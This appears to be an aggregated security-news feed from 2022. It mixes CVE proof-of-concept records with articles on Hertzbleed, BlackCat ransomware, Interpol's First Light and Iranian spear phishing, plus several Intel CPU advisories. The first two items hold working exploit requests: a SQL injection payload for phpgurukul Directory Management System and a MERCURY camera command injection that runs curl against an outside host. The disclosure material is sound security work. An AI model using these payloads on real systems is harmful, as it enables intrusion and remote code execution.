Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the fullname parameter in add-directory.php.

\> \[Suggested description\]

\> Directory Management System v1.0 was discovered to contain a SQL

\> injection vulnerability via the fullname parameter in

\> add-directory.php.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> SQL Injection

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> phpgurukul

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Directory Management System - 1.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> add-directory.php

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Remote

\>

\> ------------------------------------------

\>

\> \[Impact Information Disclosure\]

\> true

\>

\> ------------------------------------------

\>

\> \[Attack Vectors\]

\> POST /dms/admin/add-directory.php HTTP/1.1

\> Host: ip

\> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0

\> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8

\> Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

\> Accept-Encoding: gzip, deflate

\> Content-Type: application/x-www-form-urlencoded

\> Content-Length: 178

\> Connection: close

\> Cookie: PHPSESSID=eml4bgiglhno5kgmjj8uld5qgs

\> Upgrade-Insecure-Requests: 1

\>

\> fullname=database()','$profession','$email','$mobilenumber','$address',database(),'$admsta')%23&profession=aaaa&email=aaa%40aaa.aaa&mobilenumber=aaa&city=aaa&address=aaaa&submit=

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> laotun

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> http://directory.com

\> http://phpgurukul.com

Use CVE-2022-31384.

CVE-2022-31384: POC/CVE-2022-31384.txt at main · laotun-s/POC

Hertzbleed is a new side-channel attack that can recover sensitive information from a targeted system by applying CPU timing.
The post Hertzbleed exposes computers’ secret whispers appeared first on Malwarebytes Labs.

Hertzbleed is the name for a vulnerability that can be used to obtain cryptographic keys and other secret data from Intel and AMD CPUs, remotely. It works by monitoring changes in power consumption, which can be deduced by the careful timing of known workloads, thanks to a processor power saving feature called dynamic voltage and frequency scaling (DVFS).

**A remote DVFS side channel**

DVFS describes the adjustment of power and speed settings on a computer’s various processors, controller chips, and peripheral devices. By throttling the speed of the chips, DVFS can prolong battery life and reduce cooling costs.

When CPUs process data, transistors are switched on and off depending on the data being processed. Switching transistors uses energy. Consequently, running the same workload with different data may change the CPU’s power consumption.

Those differences trigger changes in the frequency set by DVFS. Which means the same program will run at a different frequency if the input is different—even if it is just slightly different. Those frequency changes can be deduced by monitoring the time it takes for a server to respond to specific, carefully made queries.

This allows an attacker with a stopwatch and enough datapoints to perform a “side-channel” attack and infer the data the CPU was processing. (A side-channel attack is an attack based on information that can be observed because of the way a computer protocol or algorithm is implemented.)

**Vulnerability or feature?**

DVFS is a useful feature of modern processors. But like some other useful features of modern processors, it turns out to have a security downside. In this case, the downside has been assigned two CVEs:

*   CVE-2022-23823: A potential vulnerability in some AMD processors using frequency scaling may allow an authenticated attacker to execute a timing attack to potentially enable information disclosure.
*   CVE-2022-24436: Observable behavioral in power management throttling for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via network access.

Hertzbleed affects all Intel and several AMD processors. Other processor vendors which also implement frequency scaling in their products may be affected.

**Should I worry?**

As with many threats, the risk you are running very much depends on your threat model. If you are working with highly confidential data, and there is reason to believe that advanced threat actors might be after that data, then you may have a reason to worry about it. For anyone else, it’s something to be aware of, but not necessarily something you need to act upon.

It is a known fact that threat actors can extract secret cryptographic data from a chip by measuring the power it consumes while processing cryptographic keys and other secret data. But the means for exploiting power-analysis attacks against microprocessors has always been limited because the threat actors had few viable ways to remotely measure power consumption while processing the secret material.

Hertzbleed reduces the requirements. Making power side-channel attacks into timing attacks that can be done remotely. But it will still take many hours and some level of proximity to recover a full cryptographic key. For example, the proof-of-concept attack took 36 to 89 hours to recover a full secret key from a system on the same network.

Most cybercriminals aren’t going to bother with Hertzbleed and will continue to rely on phishing, Word macros, skimmers, and other well worn tricks, but that doesn’t mean that advanced, well-resourced threat actors won’t.

According to Intel, who held the research results under embargo but decided not to deploy any patches:

> “While this issue is interesting from a research perspective, we do not believe this attack to be practical outside of a lab environment.”

**Mitigation**

There are ways to disable the features that make Hertzbleed possible, but it will come at a price: Your system will be considerably slower. You would have to disable what Intel calls “Turbo Boost”, and AMD calls “Turbo Core” or “Precision Boost”. For more information, you can read the official security advisories by Intel and AMD.

The preferable way to mitigate is to deal with the vulnerability in the code of programs that handle cryptographic ciphers and other confidential data. Hertzbleed shows that current industry guidelines for how to write constant-time code (such as Intel’s) are insufficient to guarantee constant-time execution on modern processors. So improvements in that field will be necessary.

Stay safe, everyone!

Hertzbleed exposes computers’ secret whispers

MERCURY MIPC451-4 1.0.22 Build 220105 Rel.55642n was discovered to contain a remote code execution (RCE) vulnerability which is exploitable via a crafted POST request.

**MERCURY MIPC451-4 command\_execution**

**CVE ID**:

**Vender**: MERCURY

**Vendor Homepage**: https://www.mercurycom.com.cn/

**Affect products**: MIPC451-4

**Firmware version**: 1.0.22 Build 220105 Rel.55642n

**Hardware Link**: https://service.mercurycom.com.cn/download/202109/MIPC451-4%20V2.0%E5%8D%87%E7%BA%A7%E8%BD%AF%E4%BB%B620210414\_1.0.6.zip

**Exploit Author**: SkYe231@Hillstone

**describe**

The Mercury MIPC451-4 has remote command execution, and remote attackers can bypass restrictions through carefully constructed packets to achieve remote command execution.

**detail**

Taking the mailbox name as the core filtering rule of username, the rules only filter the mailbox format (see the code comments for details), and do not filter special symbols, so there is a chance of injection.

> file:/usr/bin/dsd

/\* expect return value 1 \*/

int FUN\_00024aa4(byte \*param\_1)

{
  size\_t sVar1;
  char \*pcVar2;
  int iVar3;
  
                    /\* username is empty \*/
  if (param\_1 == (byte \*)0x0) {
    return 0;
  }
                    /\* length is 0 \*/
  sVar1 = strlen((char \*)param\_1);
  if (sVar1 == 0) {
    return 0;
  }
                    /\* Limit length<129 \*/
  if ((int)sVar1 < 129) {
                    /\* matches @ \*/
    pcVar2 = strchr((char \*)param\_1,L'@');
                    /\* no matches \*/
    if (pcVar2 == (char \*)0x0) {
      return 0;
    }
                    /\* Does it end with @ \*/
    if (param\_1\[sVar1 - 1\] != 0x40) {
                    /\* Does it start with @ \*/
      iVar3 = \*param\_1 - 0x40;
      if (iVar3 != 0) {
        iVar3 = 1;
      }
      return iVar3;
    }
  }
  return 0;
}

**EXP**

1.  Log in to the background to get **stok** (cookie)
    
        POST / HTTP/1.1
        Host: 192.168.0.103
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
        Accept: application/json, text/javascript, */*; q=0.01
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/json; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Content-Length: 73
        Origin: http://192.168.0.103
        Connection: close
        Referer: http://192.168.0.103/
        
        {"method":"do","login":{"username":"{your_name}","password":"{your_password}"}}
        
    
2.  Trigger remote command execution
    
    > Command:curl$IFS-o-$IFS'http://192.168.0.101:9999/skye231'
    
        POST /stok=05173d0162e8c77387fa1bbc12b2fa62/ds HTTP/1.1
        Host: 192.168.0.103
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
        Accept: application/json, text/javascript, */*; q=0.01
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/json; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Content-Length: 147
        Origin: http://192.168.0.103
        Connection: close
        Referer: http://192.168.0.103/
        
        {"cloud_config":{"bind":{"username":"\"}';curl$IFS-o-$IFS'http://192.168.0.101:9999/skye231';'{\"@mrskye.com","password":"admin123"}},"method":"do"}

CVE-2022-31849: Vuln/MERCURY_MIPC451-4/command_execution_0 at master · skyedai910/Vuln

Microsoft is warning that the BlackCat ransomware crew is leveraging exploits for unpatched Exchange server vulnerabilities to gain access to targeted networks.
Upon gaining an entry point, the attackers swiftly moved to gather information about the compromised machines, followed by carrying out credential theft and lateral movement activities, before harvesting intellectual property and

Microsoft is warning that the BlackCat ransomware crew is leveraging exploits for unpatched Exchange server vulnerabilities to gain access to targeted networks.

Upon gaining an entry point, the attackers swiftly moved to gather information about the compromised machines, carrying out credential theft and lateral movement activities, before harvesting intellectual property and dropping the ransomware payload.

The entire sequence of events played out over the course of two full weeks, the Microsoft 365 Defender Threat Intelligence Team said in a report published this week.

"In another incident we observed, we found that a ransomware affiliate gained initial access to the environment via an internet-facing Remote Desktop server using compromised credentials to sign in," the researchers said, pointing out how "no two BlackCat 'lives' or deployments might look the same."

BlackCat, also known by the names ALPHV and Noberus, is a relatively new entrant to the hyperactive ransomware space. It's also known to be one of the first cross-platform ransomware written in Rust, exemplifying a trend where threat actors are switching to uncommon programming languages in an attempt to evade detection.

The ransomware-as-a-service (RaaS) scheme, irrespective of the varying initial access vectors employed, culminates in the exfiltration and encryption of target data that's then held ransom as part of what's called double extortion.

The RaaS model has proven to be a lucrative gig economy-style cybercriminal ecosystem consisting of three different key players: access brokers (IABs), who compromise networks and maintain persistence; operators, who develop and maintain the ransomware operations; and affiliates, who purchase the access from IABs to deploy the actual payload.

According to an alert released by the U.S. Federal Bureau of Investigation (FBI), BlackCat ransomware attacks have victimized at least 60 entities worldwide as of March 2022 since it was first spotted in November 2021.

Furthermore, Microsoft said that "two of the most prolific" affiliate threat groups, which have been associated with several ransomware families such as Hive, Conti, REvil, and LockBit 2.0, are now distributing BlackCat.

This includes DEV-0237 (aka FIN12), a financially motivated threat actor that was last seen targeting the healthcare sector in October 2021, and DEV-0504, which has been active since 2020 and has a pattern of shifting payloads when a RaaS program shuts down.

"DEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022," Microsoft noted last month. "Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

BlackCat Ransomware Gang Targeting Unpatched Microsoft Exchange Servers

Interpol's annual First Light project has gone global for the second time. We take a look at the results, findings, and trends.
The post Interpol’s First Light operation smashes crime on a global scale appeared first on Malwarebytes Labs.

A large-scale Interpol operation has resulted in arrested and ill-gotten gains seizures galore. Operation First Light took place between March and May of this year. It involved 76 countries taking social engineers and telecommunications fraudsters to task, with multiple wins for those involved.

**Taking the fight to the scammers**

The operations focused on several popular scams in play from criminals the world over, including telephone scams, romance, email deception (Business Email Compromise, which targets business), and related aspects of financial crime.

All around the world, law enforcement collected huge hauls of ill-gotten gains and electronic devices. Cash and forged official documents were seized in Hong Kong. Multiple national call centres suspected of telecommunications fraud were also raided. The haul in Portugal included dozens of laptops, mobile devices of all varieties, and stacks of counterfeit official documents. These results are just the tip of the iceberg.

**When an operation gets results**

First Light occurs annually and has been in operation since 2014. This year, it was funded by China’s Ministry of Public Security. Originally the project focused on Southeast Asia, and this is the second time the operation has gone global. Here’s some of the preliminary findings by Interpol, with numbers subject to change as more details are confirmed:

*   1,770 locations raided worldwide
*   Some 3,000 suspects identified
*   Around 2,000 operators, fraudsters and money launderers arrested
*   Roughly 4,000 bank accounts frozen
*   Some USD 50 million worth of illicit funds intercepted

At this stage, there are only a few examples of arrests and backgrounds to specific crimes available. Some notable examples have been given, however:

> Based on intelligence exchanged in the framework of the operation, the Singapore Police Force rescued a teenage scam victim who had been tricked into pretending to be kidnapped, sending videos of himself with fake wounds to his parents and seeking a EUR 1.5 million ransom.
> 
> A Chinese national wanted in connection with a Ponzi scheme estimated to have defrauded nearly 24,000 victims out of EUR 34 million was arrested in Papua New Guinea and returned to China via Singapore.

Interpol also mentions 8 suspects arrested in Singapore for “Ponzi-like” job scams. In the example given, victims were lured with the promise of high-paying online marketing jobs. Small initial earnings led to situations where they had to recruit more members to earn commissions.

**Trends and concerns**

Some of the most pressing observations from the forces working this operation are as follows:

*   the way money mule herders are laundering money through the personal bank accounts of victims;
*   how social media platforms are driving human trafﬁcking, entrapping people into forced labour, sexual slavery, or captivity in casinos or on fishing vessels;
*   an increase in vishing fraud with criminals pretending to be bank officials to trick victims into sharing online log-in details;
*   a growth in cybercriminals posing as INTERPOL officials to obtain money from victims believing themselves to be under investigation.

Impersonation of law enforcement and other official entities is a mainstay of email fraud and extortion scams. It’s also popular where scams involving visas are concerned. There can’t be many people who have yet to experience a fake banking SMS at this point. Social media has also been a problem where trafficking and forced labour are concerned for some time now.

Money muling and bogus jobs are big business, and makes regular appearances on Malwarebytes Labs. Much of this ties into fake job opportunities. It can also occur as the result of email and social media outreach. If you’re really unlucky, you could be sucked into bogus NFT art projects which eventually offer up some malware. You may even be caught out by fake postings on legitimate job hunting portals.

For scammers, the sky’s the limit. It is, however, nice to see globally coordinated law enforcement operations making some sort of dent in proceedings. It’s up to us to pay attention to upcoming criminal trends, and do what we can to avoid falling for them.

Interpol’s First Light operation smashes crime on a global scale

Analysts have uncovered an Iran-linked APT sending malicious emails to top Israeli government officials.

Analysts have uncovered an Iran-linked APT sending malicious emails to top Israeli government officials.

An advanced persistent threat group, with ties to Iran, is believed behind a phishing campaign targeting high-profile government and military Israeli personnel, according to a report by Check Point Software.

Targets of the campaign included a senior leadership in the Israeli defense industry, the former U.S. Ambassador to Israel and the former Deputy Prime Minister of Israel.

The goal of the campaign, the researchers said, was to obtain personal information from targets.

**Fake Emails from Legit Addresses**

One of the targets, according to Check Point, is Tzipi Livni, Israel’s former foreign minister, minister of justice and vice prime minister. Researchers believe that the target was selected because of the high-caliber list of contacts in her address book.

Not long ago she received an email from, according to the researchers, “a well-known former Major General in the IDF who served in a highly sensitive position.” The sender address was not spoofed – it was the same domain she’d corresponded with before. Translated from Hebrew, the message read:

> _Hello my dear friends, Please see attached article to summarize the year. ((\*eyes only\*))_ _Of course I don’t want it to be distributed, because it is not the final version. I would be happy to receive remarks of any kind. Have a great rest of the day._

The message contained a link. Livni delayed in clicking the link, prompting several follow-up emails.

> _Good morning, I haven’t heard from you. Some friends sent me remarks. Your remarks are also very important to me. I know you are very busy. But I wanted to ask you to take your time and read the article. Good week_

The persistence of the sender and flurry of messages raised her suspicions, according to Check Point. After Livni met with the former Major General, it became clear that the emails were sent from a compromised account and the contents of the messages were part of a phishing attack.

It was a similar story for the other targets in this campaign – suspect emails were being sent from legitimate contacts.

**What Really Happened**

The method of attack wasn’t particularly technical. “The most sophisticated part of the operation is the social engineering,” Sergey Shykevich, threat intelligence group manager at Check Point Research, noted. He said, the campaign was “a very targeted phishing chain that is specifically crafted for each target.” Personally crafted phishing emails is a technique called spear phishing.

The attackers initiated their spear phishing attacks, first by compromising an email address book belonging to a contact of their target. Then, using the hijacked account, they’d continue an already existing email chain between the contact and the target. In time, they’d steer the conversation towards conning the target to clicking on or opening a malicious link or document.

“Some of the emails include a link to a real document that is relevant to the target,” Check Point’s analysts noted. For example, an “invitation to a conference or research, phishing page of Yahoo, link to upload document scans.”

“The goal,” in the end, was “to steal their personal information, passport scans, and steal access to their mail accounts.”

**Who and Why**

“We have solid evidence that it started at least from December 2021,” Shykevich wrote, “but we assume that it started earlier.”

In their analysis, the researchers found evidence they believe points to the Iran-linked Phosphorus APT group (a.k.a. Charming Kitten, Ajax Security, NewsBeef, APT35). Phosphorus is one of Iran’s most active APTs, with “a long history of conducting high-profile cyber operations, aligned with the interest of the Iranian regime, as well as targeting Israeli officials.”

Iran and Israel are usually at odds, and these attacks came “in the midst of escalating tensions between Israel and Iran. With recent assassinations of Iranian officials (some affiliated with the Israeli’s Mossad), and the thwarted attempts to kidnap Israeli citizens worldwide, we suspect that Phosphorous will continue with its ongoing efforts in the future.”

State-Sponsored Phishing Attack Targeted Israeli Military Officials

Digital transformation helps businesses keep operating and stay competitive. Here are the ways to think about security so that businesses reap the benefits without taking on associated risks.

**Question: How should I think about security when considering digital transformation projects?**

**Niv Weisenberg, Senior Director of Cyber Digital Transformation, Optiv**: Multiple factors contribute to the sheer number of digital transformation projects underway today: the proliferation of the Internet of Things (IoT), expanding artificial intelligence (AI) capabilities, the sudden shift to a remote workforce prompted by the global COVID-19 pandemic, and the rapid rate of cloud migration. Digital transformation is no longer a nice-to-have; it’s a must-have in order to survive and thrive in today’s business world. 

CISOs and their security teams need to think about security in the digital age from both an internal and an external perspective. For the former, security teams should introduce and adopt digital enablers to transform the information security organization. Digital enablers include the cloud, IoT, AI/machine learning (ML), and automation to transform the information security organization.   

For the latter, they should address potential risks as new digital enablers are introduced by the business to drive growth.

Here are five specific areas security teams should prioritize to achieve security-first digital transformation:

**1\. Security operations modernization**: Help security operations adopt a proactive posture when balancing the need to match technology adoption acceleration with cost management.

**2\. Developer-centric security**: Enhance overall security posture and optimize DevOps performance by embedding a culture of proactive security in the DevOps process, enabled by orchestration and automation. For example, “shift security left” in the application development process to integrate security products as developers code and into build/test processes — rather than leaving it as an after-the-fact bolt-on. This will help organizations solve issues at the point of origin, detect and remediate vulnerabilities before they hit production, and, most importantly, build a DevSecOps program that prioritizes security throughout all development phases.

**3\. Cloud strategy and execution**: Shifting security left applies in the cloud transformation journey, too. Develop a strategic roadmap for secure cloud migration, operation, and management, as well as secure architecture modernization. Also consider standing up cloud native app protection (CNAP) capabilities that will scour cloud environments and alert staff to compliance risks and configuration vulnerabilities in cloud services.

**4\. Connected devices:** Enforce critical network, device, and data protection by doing things such as hardening connected entry points to the data fabric, modernizing the data paths for IT/OT convergence, bringing legacy networks under a modern security architecture, and implementing zero trust and a software-defined perimeter.

**5\. Big data and analytics**: Maximize the value extracted from data and secure big data at scale with AI/ML-enabled analytics.

As important as it is to keep the business operating _and_ competitive, organizations must transform _securely._ Keeping security at the forefront gives the business the benefits of digital transformation without the associated risks.

How Should I Think About Security When Considering Digital Transformation Projects?

Incomplete cleanup in specific special register write operations for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Processors MMIO Stale Data Advisory**

**Summary: **

Potential security vulnerabilities in Memory Mapped I/O (MMIO) for some Intel® Processors may allow information disclosure. Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-21123

Description: Incomplete cleanup of multi-core shared buffers for some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 6.1 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

CVEID: CVE-2022-21125

Description: Incomplete cleanup of microarchitectural fill buffers on some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 5.6 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2022-21127

Description: Incomplete cleanup in specific special register read operations for some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 5.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVEID: CVE-2022-21166

Description: Incomplete cleanup in specific special register write operations for some Intel® Processors may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 5.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

**Affected Products:**

Some Intel® Processors, see full list:

https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html

**Recommendations:**

Intel recommends that users of the affected Intel® Processors update to the latest version provided by the system manufacturer that addresses these issues.

Intel® SGX PSW for Windows to version 2.16.100.3 or later: 

https://registrationcenter.intel.com/en/products/download/3406/

Intel® SGX SDK for Windows to version 2.16.100.3 or later:

https://registrationcenter.intel.com/en/products/download/3407/

Intel® SGX DCAP for Windows to version 1.14.100.3 or later:

https://registrationcenter.intel.com/en/products/download/3610/

Intel® SGX PSW for Linux to version 2.17.100.3 or later:

https://01.org/intel-software-guard-extensions/downloads

Intel® SGX SDK for Linux to version 2.17.100.3 or later:

https://01.org/intel-software-guard-extensions/downloads

Intel® SGX DCAP for Linux to version 1.14.100.3 or later:

https://01.org/intel-software-guard-extensions/downloads

To address this issue, an SGX TCB recovery is planned for Q2 2022. Customers will require the software update to get successful attestation responses. For customers using the Intel Attestation Service (IAS), the IAS Development Environment (DEV) will enforce the microcode and software updates beginning June 21, 2022 and the IAS Production Environment (LIV) will enforce the updates beginning July 19, 2022.

For customers that are not using IAS, but instead are constructing their own attestation infrastructure using the Intel® SGX Provisioning Certificate Service (PCS), updated Endorsements/Reference Values (i.e., PCK Certificates and verification collateral) will be available June 28, 2022. These customers decide when to enforce the microcode and software update, as part of their Appraisal Policies.

Refer to Intel® SGX Attestation Technical Details for more information on the SGX TCB recovery process.

Further TCB Recovery Guidance for developers is available. 

**Acknowledgements:**

The following issues were found internally by Intel employees.  Intel would like to thank Ke Sun, Alan Miller, Shlomi Alkalay, Robert Jones, Ezra Caltum for reporting CVE-2022-21123, CVE-2022-21125, CVE-2022-21127, CVE-2022-21166. Jason Kilman for reporting CVE-2022-21123, CVE-2022-21127, and Scott Cape and Anthony Wojciechowski for reporting CVE-2022-21127.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/14/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-21166: INTEL-SA-00615

Improper input validation for some Intel(R) Processors may allow an authenticated user to potentially cause a denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® Processors MMIO Undefined Access Advisory**

**Summary: **

A potential security vulnerability in Memory Mapped I/O (MMIO) for some 14nm Client/Xeon E3 Intel® Processors may allow a denial of service in certain virtualized environments.

**Vulnerability Details:**

CVEID: CVE-2022-21180

Description: Improper input validation for some Intel® Processors may allow an authenticated user to potentially cause a denial of service via local access.

CVSS Base Score: 5.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

**Affected Products:**

Some 14nm Client/Xeon E3 Intel® Processors, see full list:

https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html

**Recommendations:**

Intel recommends that users of affected Intel® Processors update to the latest Virtual Machine Monitor provided by the VMM or OS provider that addresses these issues.

**Acknowledgements:**

This issue was found internally by Intel employees. Intel would like to thank Alysa Milburn, Jason Brandt, Avishai Redelman, Nir Lavi for reporting this issue.  Intel would like to thank Ke Sun, Alan Miller, Shlomi Alkalay, Robert Jones, and Ezra Caltum.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/14/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-21180: INTEL-SA-00645

Observable behavioral in power management throttling for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via network access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Software Developer Guidance for Power Advisory**

**Summary: **

A potential security vulnerability in some Intel® Processors may allow information disclosure. Intel is releasing guidance to address this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-24436

Description: Observable behavioral in power management throttling for some Intel(R) Processors may allow an authenticated user to potentially enable information disclosure via network access.

CVSS Base Score: 6.3 Medium

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

**Affected Products:**

All Intel® Processors are affected.

**Recommendations:**

Intel is providing Software Guidance for cryptographic implementations. Cryptographic developers may choose to follow the guidance to harden their libraries and applications against frequency throttling information disclosure.

**Acknowledgements:**

Intel would like to thank the following external users for reporting this issue.

*   Yingchen Wang (University of Texas at Austin)
*   Riccardo Paccagnella (University of Illinois Urbana-Champaign)
*   Elizabeth Tang He (University of Illinois Urbana-Champaign)
*   Hovav Shacham (University of Texas at Austin)
*   Christopher Fletcher (University of Illinois Urbana-Champaign)
*   David Kohlbrenner (University of Washington)

Intel would like to thank the following Intel employees for finding this issue internally.

*   Chen Liu
*   Nadav Shulman
*   Jim Hermerding
*   Neer Roggel
*   Ilya Alexandrovich
*   Terry Wang (former Intel employee)

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

06/14/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel, processors, chipsets, and desktop boards may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at https://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  
Copyright © Intel Corporation 2022

